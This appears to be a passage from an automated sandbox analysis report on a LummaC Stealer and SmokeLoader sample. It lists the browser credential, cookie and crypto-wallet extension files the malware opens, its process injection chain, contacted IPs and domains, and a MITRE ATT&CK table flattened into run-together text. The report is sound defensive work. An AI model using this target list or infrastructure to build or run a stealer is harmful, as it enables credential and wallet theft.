                Source: RegAsm.exe, 00000016.00000002.1122515831.00000000039FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Chrome/Default/Extensions/ExodusWeb3
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000149A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: RegAsm.exe, 00000016.00000002.1121991366.000000000153B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: RegAsm.exe, 00000016.00000002.1121991366.0000000001516000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.ldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.oldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000008.logJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000007.ldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 1072, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\Outlook FilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1048474823.000000000407D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 1072, type: MEMORYSTR
                Yara detected SmokeLoader
                Source: Yara matchFile source: 0.3.file.exe.2330000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.3.aueuggs.2510000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aueuggs.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.aueuggs.2500e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.900683183.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.951015355.0000000002531000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.885330632.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000003.939764066.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.900666807.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.951003696.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Local\Temp\6E11.exeCode function: 21_2_6F0BA0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,21_2_6F0BA0C0

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium12
                Ingress Tool Transfer                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution                		Boot or Logon Initialization Scripts612
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		12
                File and Directory Discovery                		Remote Desktop Protocol21
                Data from Local System                		Exfiltration Over Bluetooth2
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information                		Security Account Manager34
                System Information Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		Automated Exfiltration3
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Software Packing                		NTDS531
                Security Software Discovery                		Distributed Component Object Model1
                Input Capture                		Scheduled Transfer123
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Timestomp                		LSA Secrets231
                Virtualization/Sandbox Evasion                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                DLL Side-Loading                		Cached Domain Credentials13
                Process Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                File Deletion                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                Masquerading                		Proc Filesystem1
                Remote System Discovery                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)231
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadow1
                System Network Configuration Discovery                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)612
                Process Injection                		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                Hidden Files and Directories                		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1318516 Sample: file.exe Startdate: 03/10/2023 Architecture: WINDOWS Score: 100 62 Snort IDS alert for network traffic 2->62 64 Multi AV Scanner detection for domain / URL 2->64 66 Found malware configuration 2->66 68 9 other signatures 2->68 8 file.exe 2->8         started        11 aueuggs 2->11         started        process3 signatures4 80 Detected unpacking (changes PE section rights) 8->80 82 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->82 84 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->84 92 3 other signatures 8->92 13 explorer.exe 3 7 8->13 injected 86 Antivirus detection for dropped file 11->86 88 Multi AV Scanner detection for dropped file 11->88 90 Machine Learning detection for dropped file 11->90 process5 dnsIp6 56 186.147.159.19, 49809, 80 TelmexColombiaSACO Colombia 13->56 58 186.182.55.44, 49810, 49813, 49826 TechtelLMDSComunicacionesInteractivasSAAR Argentina 13->58 60 5 other IPs or domains 13->60 36 C:\Users\user\AppData\Roaming\aueuggs, PE32 13->36 dropped 38 C:\Users\user\AppData\Local\TempDBC.exe, PE32 13->38 dropped 40 C:\Users\user\AppData\Local\Temp\6E11.exe, PE32 13->40 dropped 42 C:\Users\user\...\aueuggs:Zone.Identifier, ASCII 13->42 dropped 102 System process connects to network (likely due to code injection or exploit) 13->102 104 Benign windows process drops PE files 13->104 106 Deletes itself after installation 13->106 108 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->108 18 6E11.exe 2 13->18         started        22 EDBC.exe 1 13->22         started        file7 signatures8 process9 file10 34 C:\Users\user\AppData\...\Protect544cd51a.dll, PE32 18->34 dropped 70 Machine Learning detection for dropped file 18->70 72 Writes to foreign memory regions 18->72 74 Allocates memory in foreign processes 18->74 24 RegAsm.exe 12 18->24         started        76 Antivirus detection for dropped file 22->76 78 Injects a PE file into a foreign processes 22->78 28 AppLaunch.exe 12 22->28         started        30 WerFault.exe 3 10 22->30         started        32 conhost.exe 22->32         started        signatures11 process12 dnsIp13 44 fiancejiveimp.fun 104.21.81.17, 49829, 49834, 49838 CLOUDFLARENETUS United States 24->44 46 172.67.137.125, 49842, 49845, 49847 CLOUDFLARENETUS United States 24->46 48 fullppc.xyz 24->48 94 Query firmware table information (likely to detect VMs) 24->94 96 Performs DNS queries to domains with low reputation 24->96 98 Found many strings related to Crypto-Wallets 